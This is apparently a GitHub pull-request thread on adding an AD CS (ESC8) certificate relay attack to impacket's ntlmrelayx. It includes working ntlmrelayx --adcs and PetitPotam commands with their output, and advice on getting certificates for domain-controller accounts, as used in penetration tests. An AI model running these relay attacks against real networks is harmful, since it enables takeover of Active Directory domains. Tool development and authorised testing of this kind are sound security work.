Implementation of AD CS attack in ntlmrelayx.py

[ExAndroidDev]

In recently published AD CS research by harmj0y and tifkin_ this misconfiguration is refered as ESC8.

[jeffmcjunkin]

I felt a great disturbance in the Force Blue Team, as if millions of voices suddenly cried out in terror and were suddenly silenced exploited. I fear something terrible has happened.

[fsacer]

well this worked for me 👍

[pantsman0]

Seconding @fsacer. This worked for me on a penetration test. I had some issues with Rubeus, but the ADCS attack worked fine.

I think a good extension of this would be to add the -i flag, as the change doesn't keep track of successfully exploited users.
This leads to multiple certificates being issued for users with multiple authentication attempts.

Apart from log-spam/opsec, this is a remediation papercut for penetration test customers.

[okiwoki]

Seconding @fsacer. This worked for me on a penetration test. I had some issues with Rubeus, but the ADCS attack worked fine.

I think a good extension of this would be to add the -i flag, as the change doesn't keep track of successfully exploited users.
This leads to multiple certificates being issued for users with multiple authentication attempts.

Apart from log-spam/opsec, this is a remediation papercut for penetration test customers.

What issue did you have on Rubeus? I'm running into several issues like error 75 (KDC_ERR_CLIENT_NAME_MISMATCH) or 16 (KDC_ERR_PADATA_TYPE_NOSUPP)

[pantsman0]

I was having KRB error 62 (KDC_ERR_CLIENT_NOT_TRUSTED) when trying to asktgt with the certificate as auth.

[snovvcrash]

What issue did you have on Rubeus? I'm running into several issues like error 75 (KDC_ERR_CLIENT_NAME_MISMATCH) or 16 (KDC_ERR_PADATA_TYPE_NOSUPP)

Same here. Facing the KDC_ERR_CLIENT_NAME_MISMATCH (75) error as well.

UPD. It appears that the KDC_ERR_CLIENT_NAME_MISMATCH error happens when there's no SAN defined for a certificate template, i.e. all of the boxes in the red area are unchecked (or if the HKLM\SYSTEM\CurrentControlSet\Services\Kdc\UseSubjectAltName setting equals DWORD 0 on all the DCs as stated in the original research, page 111):

As for the KDC_ERR_CLIENT_NOT_TRUSTED error, see this tweet @pantsman0

[kapshure]

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

[czz1233]

有人遇到过这个错误信息吗？

me too

[pantsman0]

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

Make sure you've installed the patched impacket library from this commit or the fork.

[RapidWolf95]

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

I'm running into the same issue. Here is what I ran to clone the master branch of impacket and check out the pull request from exandroiddev:

git clone https://github.com/SecureAuthCorp/impacket ./impacket
cd impacket
git fetch origin pull/1101/head:ntlmrelayx-adcs-attack
git checkout ntlmrelayx-adcs-attack
cd examples
python3 ntlmrelayx.py -t http://my.victim.host/certsrv/certfnsh.asp -smb2support --adcs

The output I get is:

Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation

[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
Traceback (most recent call last):
  File "/home/twilson/resources/linux/impacket-adcs/examples/ntlmrelayx.py", line 404, in <module>
    c = start_servers(options, threads)
  File "/home/twilson/resources/linux/impacket-adcs/examples/ntlmrelayx.py", line 167, in start_servers
    c.setIsADCSAttack(options.adcs)
AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

I see that pantsman0 has mentioned:

Make sure you've installed the patched impacket library from this commit or the fork.

Which I thought is what I was doing by cloning the master branch from impacket, but obviously I'm missing something.

Posting something here in case anyone else ran into the same issue and figured it out so everyone can learn from it.

[pantsman0]

@RapidWolf95 @kapshure to install the modified impacket library, you can use the following command from the root of the repository
python setup.py install

If you don't want to overwrite your system install, I would suggest setting up a virtual environment first. If you have virtualenv, you can do so with this command:
virtualenv -p python3 .

The virtual environment can then be activated each time you need to use this library version by running
source ./bin/activate

[RapidWolf95]

@RapidWolf95 @kapshure to install the modified impacket library, you can use the following command from the root of the repository
python setup.py install

If you don't want to overwrite your system install, I would suggest setting up a virtual environment first. If you have virtualenv, you can do so with this command:
virtualenv -p python3 .

The virtual environment can then be activated each time you need to use this library version by running
source ./bin/activate

Thanks @pantsman0! I feel silly now, but that was exactly it. I was trying not to overwrite the system install and somehow didn't even consider that as part of the issue.
Appreciate the help! It's working now!

[octopodpotato]

Does anyone recognize what is going wrong?
sudo python3 ./examples/ntlmrelayx.py -debug -smb2support --target http://**/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

[] HTTP server returned error code 200, treating as a successful login
[] Authenticating against ** as ** SUCCEED
[] Generating CSR...
[] CSR generated!
[] Getting certificate...
[] Error obtaining certificate!

meanwhile petitpotam:

[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
Something went wrong, check error status => The NETBIOS connection with the remote host timed out.

[robvinson]

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode. Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

[pantsman0]

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode.]

This would be a good option, reponder tracks user hashes and doesn't print out hashes for duplicate users. Something to prevent a certificate request for a previously successful user would be great utility, good opsec, and and make defender cleanup easier.

Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

If you have the certificates in files, you can do something like this:

# for f in *.pem; do openssl x509 -inform pem -in $f -noout -fingerprint SHA1; done

[ExAndroidDev]

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode. Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

This has been implemented now. Thanks @Tw1sm .

[S3cur3Th1sSh1t]

I had an ADCS endpoint now who didn't accept NTLM auth but asked for Netotiate:

NTLM Auth not offered by URL, offered protocols: Negotiate

Is there a plan to support Negotiate auth in the future? Is it even possible to relay that?

Greetings

[mpgn]

Test with this PR #1146 @S3cur3Th1sSh1t

[S3cur3Th1sSh1t]

@mpgn worked fine, thanks for the hint! :-)

[frisch-raphael]

Hi,

I've been trying this pull request on a test lab, but while the petitpotam part seems to work, the authentification to the target DC is failing.

python3 PetitPotam.py 192.168.1.38 192.168.1.100   

[-] Connecting to ncacn_np:192.168.1.100[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

python3 ./examples/ntlmrelayx.py -debug -t http://192.168.1.100/certsrv/certfnsh.asp -smb2support --adcs
Impacket v0.9.24.dev1+20210930.62146.668ca3ca - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /opt/impacket/lib/python3.9/site-packages/impacket-0.9.24.dev1+20210930.62146.668ca3ca-py3.9.egg/impacket
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections
^[[A[*] SMBD-Thread-4: Connection from ETHICALHACKERS/DOMAIN-CONTROLL$@192.168.1.100 controlled, attacking target http://192.168.1.100
[-] Authenticating against http://192.168.1.100 as ETHICALHACKERS/DOMAIN-CONTROLL$ FAILED

While looking at the resulting pcap, we can see that the relayed authentication gets a 401.

Here's the full pcap:

ntlmx_adcs_authent_failing.zip

Any idea on what could be wrong / how to debug more thoroughly ? May be it's a case where you can't relay an authentication to itself ?

[Tw1sm]

@frisch-raphael Haven't looked at the pcap but my initial thought is that I don't believe you can relay auth back to the machine you coerced it from. I'd try PetitPotam against a different DC or a workstation.

[mpgn]

Probably the wrong template, try "DomainController"

[aconite33]

Does anyone recognize what is going wrong? sudo python3 ./examples/ntlmrelayx.py -debug -smb2support --target http://**/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

[] HTTP server returned error code 200, treating as a successful login [] Authenticating against ** as ** SUCCEED [] Generating CSR... [] CSR generated! [] Getting certificate... [] Error obtaining certificate!

meanwhile petitpotam:

[+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! Something went wrong, check error status => The NETBIOS connection with the remote host timed out.

@octopodpotato Did you ever find a resolution to this? I'm encountering the same problem and even with -debug flag I can't get the reason why it's failing. I'm able to invoke a response from a DC$ but it errors out here.

[S3cur3Th1sSh1t]

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

[aconite33]

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

[frisch-raphael]

@frisch-raphael Haven't looked at the pcap but my initial thought is that I don't believe you can relay auth back to the machine you coerced it from. I'd try PetitPotam against a different DC or a workstation.

You were right. I sat up a separate CA and it seems to work better.

[S3cur3Th1sSh1t]

The easiest way to find out the issue is printing the Webserver responses from my point of view.
That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

Edit the source code and add a print statement for the response 😉

[aconite33]

The easiest way to find out the issue is printing the Webserver responses from my point of view.
That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

Edit the source code and add a print statement for the response 😉

I figured as much. I was in the middle of an assessment and didn't have time to go deep. Figured out my issue by using the Kerberos authentication template. But yeah I will take a look and maybe make a verbose output if the debug flag is on.

[0xdeaddood]

Hi @ExAndroidDev!

This is an amazing addition! Just one thing before merging, could you refactor the httpattack.py code in order to create submodules with the different HTTP attacks? In this case, we'll have a submodule HTTPattack with the adcsrelayattack. It's something similar to what is proposed in #1173 with the different rpc attacks. What do you think?

Thanks!!!

[ExAndroidDev]

Hi @0xdeaddood ,
Sorry for the late response, I somehow missed your comment.
It sounds good to me. I will start working on it.

[pantsman0]

Another idea that I've been thinking about it supporting the -i option that SMB and LDAP attacks support.
It would be great if we could just relay credentials to get an active HTTP connection that is kept alive - and then a telnet shell that allows other functions that we may want in that context ( e.g. I think you can list allowed certificate templates from certrqus.asp), or event just try multiple templates without needing to re-invoke smbrelayx.

I've been looking at working on this on my own time, but my work situation means I can't devote serious time to it until December. I thought I would put it out there in case anyone else is interested in working on these features.

[ExAndroidDev]

Hey @pantsman0 , great idea, but unfortunately I am also short on time.

Hey @0xdeaddood , I have just refactored the code. Please let me know what you think. Thanks!

[0xdeaddood]

Thanks a lot, @ExAndroidDev! Merging...

[Cyb3rC3lt]

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

Any chance you could point out where and what changes they were please? I'm no python expert unfortunately. Thanks